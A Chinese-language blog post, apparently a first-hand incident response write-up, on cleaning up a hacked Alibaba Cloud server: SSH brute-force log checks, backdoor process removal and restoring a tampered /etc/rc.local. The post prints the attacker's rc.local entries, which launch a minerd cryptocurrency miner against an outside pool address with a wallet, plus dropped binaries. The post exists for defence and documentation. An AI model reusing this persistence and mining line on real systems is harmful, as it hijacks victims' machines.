解决阿里云主机收到攻击的问题

简介:

攻击类型:

主要是后门和肉鸡行为



 

先解决后门的问题:

步骤

(1)搞清楚后门文件的来历(是如何产生的)

(2)删除后门文件

具体做法:

使用定时器 定期删除后门文件

待删除的文件列表:

(a)/usr/bin/acpid

(b)/usr/bin/bsd-port/agent

定时器要执行的脚本:

 

定时器:

 

如何解决肉鸡行为呢?

查看/var/log/secure ,看到确实被多次尝试登陆

Java代码   收藏代码
  1. [root@iZ25tti3rxdZ log]# cat secure| grep 'Failed password' | cut -d " " -f 9,10,11 | sort | uniq  
  2. apache from 121.42.0.30  
  3. ftp from 121.42.0.30  
  4. invalid user admin  
  5. invalid user test  
  6. invalid user user  
  7. mail from 121.42.0.30  
  8. root from 121.42.0.30  

 

发现可疑进程:

 

 

如何提高安全性?

我觉得应该有一个机制:

当主机被大量尝试登录时应该增加提醒,比如发邮件或者发短信

 

 查看root的home目录下的.bash_history

终于发现了猫腻:

 

同时还修改我系统核心文件/etc/rc.local

 于是查看/etc/rc.local 的修改记录:

[root@iZ25tti3rxdZ ~]# stat /etc/rc.local

  File: `/etc/rc.local'

  Size: 390       Blocks: 8          IO Block: 4096   regular file

Device: ca01h/51713dInode: 787612      Links: 1

Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)

Access: 2016-01-10 16:34:59.807094407 +0800

Modify: 2015-12-07 11:23:07.160211728 +0800

Change: 2015-12-07 11:23:07.160211728 +0800

 

 说明在2015-12-07 11:23:07被人恶意修改过

再看看修改成啥样了:

#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

 

touch /var/lock/subsys/local

/tmp/minerd -a scrypt  -o 220.135.22.146:9327 -u LNZyZEbAfZDGwb3Cca13qjbcKJ2JfqTTkk

/mnt/linsx

/mnt/linsx

/mnt/linsx

/mnt/linsx

/tmp/linex

/tmp/linex

/tmp/2897

/tmp/2897

~                           

 

 

正常的:

 

解决方法:

sed -i 's/^\(.*scrypt\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/mnt\/linsx\)/# \1/' /etc/rc.local

sed -i 's/^\(.*\/tmp\/\)/# \1/' /etc/rc.local

 

 异常进程:

[root@iZ25tti3rxdZ ~]# ps -ef |grep "/usr/bin/acpid" |grep -v grep

root     16790     1  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16804 16790  0 16:48 ?        00:00:00 /usr/bin/acpid

root     16805 16804  0 16:48 ?        00:00:00 /usr/bin/acpid

如何杀*死异常进程:

Shell代码   收藏代码
  1. ps -ef |grep "/usr/bin/acpid" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}  
  2. ps -ef |grep "/usr/bin/bsd-port/agent" |grep -v grep |awk -F" "  {'print $2'}|xargs -i kill -9 {}  

 

上述代码是在定时器中执行的,每10分钟执行一次 

相关文章
|
7月前
|
存储 安全 网络安全
怎么看服务器是中毒了还是被攻击?以及后续处理方案
怎么看服务器是中毒了还是被攻击?以及后续处理方案
|
安全 网络安全 API
网站被流量攻击了,该怎么处理
网站被流量攻击了,该怎么处理
|
7月前
|
负载均衡 安全 网络协议
什么是流量攻击? 流量攻击怎么处理?
什么是流量攻击? 流量攻击怎么处理?
|
7月前
|
SQL 监控 安全
如何发现服务器被入侵了,服务器被入侵了该如何处理?
如何发现服务器被入侵了,服务器被入侵了该如何处理?
|
网络协议 安全 网络安全
记录一次云服务器遭遇SYN泛洪攻击处理方式
记录一次云服务器遭遇SYN泛洪攻击处理方式
|
安全 网络协议 数据挖掘
服务器受到DDOS流量攻击 该如何解决处理?
随之移动互联网数据网络的不断进步,在给大家提供多种多样便捷的另外,DDoS攻击的经营规模也愈来愈大,如今早已进到了Tbps的DDoS攻击时代。DDoS攻击不但经营规模愈来愈大,拒绝服务攻击也愈来愈繁杂,很多传统的ddos攻击安全防护对策已没法解决日渐演变的攻击方法。为了确保企业能彻底解决多种多样全新的ddos流量攻击,企业务必提升和更新ddos攻击安全防护对策,接下来SINE安全防护就总的来说说2020年解决全新的DDoS攻击企业需搞好哪几个安全防护对策?
334 1
服务器受到DDOS流量攻击 该如何解决处理?
|
域名解析 缓存 监控
网站被劫持攻击以及流量攻击如何解决
目前越来越多的服务器被DDOS流量攻击,尤其近几年的DNS流量攻击呈现快速增长的趋势,DNS受众较广,存在漏洞,容易遭受到攻击者的利用,关于DNS流量攻击的详情,我们来大体的分析一下,通过我们SINE安全这几年的安全监控大数据来看清DNS的攻击。一种是DNS路由劫持攻击,一种是DNS流量放大攻击。
317 0
网站被劫持攻击以及流量攻击如何解决
|
云安全 安全 网络协议
服务器被攻击了怎么办
服务器被攻击了怎么办
|
安全
网站被主机攻击断网 871
网络攻击871是怎么回事?
2809 0
|
网络协议 网络安全 数据库
ddos攻击服务器的几种方式
当前主要有三种流行的DDoS攻击:  1、SYN/ACK Flood攻击:这种攻击方法是经典最有效的DDoS方法,可通杀各种系统的网络服务,主要是通过向受害主机发送大量伪造源IP和源端口的SYN或ACK 包,导致主机的缓存资源被耗尽或忙于发送回应包而造成拒绝服务,由于源都是伪造的故追踪起来比较困难,缺点是实施起来有一定难度,需要高带宽的僵尸主机支持。
1906 0